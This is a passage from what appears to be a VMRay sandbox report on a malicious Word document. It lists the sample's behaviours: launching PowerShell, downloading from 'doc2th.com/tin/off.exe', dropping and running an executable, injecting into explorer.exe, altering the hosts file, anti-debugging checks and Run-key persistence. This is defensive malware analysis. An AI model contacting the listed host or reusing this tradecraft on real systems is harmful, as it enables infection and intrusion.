"microsoft_word_version": "15.0.4569.1504", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_32-bit_pae", "vm_kernel_version": "6.1.7601.17514_(684da42a-30cc-450f-81c5-35b4d18944b1)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Local\\!PrivacIE!SharedMemory!Mutex", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_160", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Local\\!PrivacIE!SharedMemory!Mutex\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_335", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows/system32/WindowsPowerShell/v1.0/powershell.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1446", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\.net clr networking\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "192.232.251.15", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_1483", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"doc2th.com\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1575", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Nameless", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1598", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create nameless mutex.", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\ntdll.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7163", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_file_in_os_dir", "technique_desc": "Create file \"\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_create_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\ntdll.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7163", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_overwrite_file_in_os_dir", "technique_desc": "Modify file \"\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_overwrite_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_kernel_debugger", "operation_desc": "Try to detect kernel debugger", "ref_gfncalls": [ { "ref_id": "gfn_7167", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_kernel_debugger_by_api", "technique_desc": "Check via API \"NtQuerySystemInformation\".", "technique_path": "built_in._anti_analysis._detect_kernel_debugger.vmray_detect_kernel_debugger_by_api", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_debugger", "operation_desc": "Try to detect debugger", "ref_gfncalls": [ { "ref_id": "gfn_7168", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_debugger_by_api", "technique_desc": "Check via API \"NtQueryInformationProcess\".", "technique_path": "built_in._anti_analysis._detect_debugger.vmray_detect_debugger_by_api", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\System32\\cmmon32.exe", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\cmmon32.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7191", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_file_in_os_dir", "technique_desc": "Create file \"\\??\\C:\\Windows\\System32\\cmmon32.exe\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_create_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\System32\\cmmon32.exe", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\cmmon32.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7191", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_overwrite_file_in_os_dir", "technique_desc": "Modify file \"\\??\\C:\\Windows\\System32\\cmmon32.exe\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_overwrite_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_illegitimate_api_usage", "operation_desc": "Illegitimate API usage", "ref_gfncalls": [ { "ref_id": "gfn_7194", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_illegitimate_api_usage_by_create_process_internal", "technique_desc": "Internal API \"CreateProcessInternalW\" was used to start \"C:\\Windows\\System32\\cmmon32.exe\".", "technique_path": "built_in._anti_analysis._illegitimate_api_usage.vmray_illegitimate_api_usage_by_create_process_internal", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_7194", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\System32\\cmmon32.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_read_from_remote_process", "operation_desc": "Read from memory of another process", "ref_gfncalls": [ { "ref_id": "gfn_7196", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_from_remote_process", "technique_desc": "\"c:\\windows\\explorer.exe\" reads from \"C:\\Windows\\System32\\cmmon32.exe\".", "technique_path": "built_in._process._read_from_remote_process.vmray_read_from_remote_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_delay_execution", "operation_desc": "Delay execution", "ref_gfncalls": [ { "ref_id": "gfn_7197", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_delay_execution_by_sleep", "technique_desc": "One thread sleeps more than 5 minutes.", "technique_path": "built_in._anti_analysis._delay_execution.vmray_delay_execution_by_sleep", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_read_from_remote_process", "operation_desc": "Read from memory of another process", "ref_gfncalls": [ { "ref_id": "gfn_7198", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_from_remote_process", "technique_desc": "\"c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe\" reads from \"c:\\windows\\explorer.exe\".", "technique_path": "built_in._process._read_from_remote_process.vmray_read_from_remote_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "664908S9UTEIZ6MN", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_7214", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"664908S9UTEIZ6MN\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "OLO0NDS-0AXWwKzG", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_7215", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"OLO0NDS-0AXWwKzG\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_illegitimate_api_usage", "operation_desc": "Illegitimate API usage", "ref_gfncalls": [ { "ref_id": "gfn_7224", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_illegitimate_api_usage_by_create_process_internal", "technique_desc": "Internal API \"CreateProcessInternalW\" was used to start \"C:\\Windows\\System32\\cmd.exe\".", "technique_path": "built_in._anti_analysis._illegitimate_api_usage.vmray_illegitimate_api_usage_by_create_process_internal", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_7224", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\System32\\cmd.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\drivers\\etc\\hosts", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7289", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_file_in_os_dir", "technique_desc": "Create file \"\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_create_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\drivers\\etc\\hosts", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7289", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_overwrite_file_in_os_dir", "technique_desc": "Modify file \"\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_overwrite_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\drivers\\etc\\hosts", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_read_network_configuration", "operation_desc": "Read network configuration", "ref_gfncalls": [ { "ref_id": "gfn_7293", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_hosts_file", "technique_desc": "Read the current network configuration trough the host.conf file.", "technique_path": "built_in._network._read_network_configuration.vmray_read_hosts_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_read_from_remote_process", "operation_desc": "Read from memory of another process", "ref_gfncalls": [ { "ref_id": "gfn_7304", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_from_remote_process", "technique_desc": "\"c:\\windows\\system32\\cmmon32.exe\" reads from \"c:\\windows\\explorer.exe\".", "technique_path": "built_in._process._read_from_remote_process.vmray_read_from_remote_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_persistence", "category_desc": "Persistence", "operation": "_install_startup_script", "operation_desc": "Install system startup script or application", "ref_gfncalls": [ { "ref_id": "gfn_7348", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_startup_script_by_registry", "technique_desc": "Add \"C:\\Program Files\\Crfitq6x\\gdigzvh.exe\" to windows startup via registry.", "technique_path": "built_in._persistence._install_startup_script.vmray_install_startup_script_by_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_illegitimate_api_usage", "operation_desc": "Illegitimate API usage", "ref_gfncalls": [ { "ref_id": "gfn_7566", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_illegitimate_api_usage_by_create_process_internal", "technique_desc": "Internal API \"CreateProcessInternalW\" was used to start \"C:\\Program Files\\Mozilla Firefox\\Firefox.exe\".", "technique_path": "built_in._anti_analysis._illegitimate_api_usage.vmray_illegitimate_api_usage_by_create_process_internal", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_7566", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Program Files\\Mozilla Firefox\\Firefox.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_read_from_remote_process", "operation_desc": "Read from memory of another process", "ref_gfncalls": [ { "ref_id": "gfn_7568", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_from_remote_process", "technique_desc": "\"c:\\windows\\system32\\cmmon32.exe\" reads from \"C:\\Program Files\\Mozilla Firefox\\Firefox.exe\".", "technique_path": "built_in._process._read_from_remote_process.vmray_read_from_remote_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_tcp_sessions_down", "operation_desc": "TCP Server not available", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_sessions_down", "technique_desc": "Every TCP connection attempt failed.", "technique_path": "built_in._network._tcp_sessions_down.vmray_tcp_sessions_down", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_handle_with_malicious_files", "operation_desc": "Handle with malicious files", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_handle_with_malicious_files", "technique_desc": "File \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe\" is a known malicious file.", "technique_path": "built_in._file_system._handle_with_malicious_files.vmray_handle_with_malicious_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_memory_system", "operation_desc": "Write into memory of another process", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_memory_system", "technique_desc": "\"c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe\" modifies memory of \"c:\\windows\\explorer.exe\"", "technique_path": "built_in._injection._modify_memory_system.vmray_modify_memory_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_control_flow_system", "operation_desc": "Modify control flow of another process", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_control_flow_system", "technique_desc": "\"c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe\" alters context of \"c:\\windows\\explorer.exe\"", "technique_path": "built_in._injection._modify_control_flow_system.vmray_modify_control_flow_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"doc2th.com/tin/off.exe\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_execute_dropped_pe_file", "operation_desc": "Execute dropped PE file", "ref_gfncalls": [], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_dropped_pe_file", "technique_desc": "Execute dropped file \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe\".", "technique_path": "built_in._pe._execute_dropped_pe_file.vmray_execute_dropped_pe_file", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 100 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }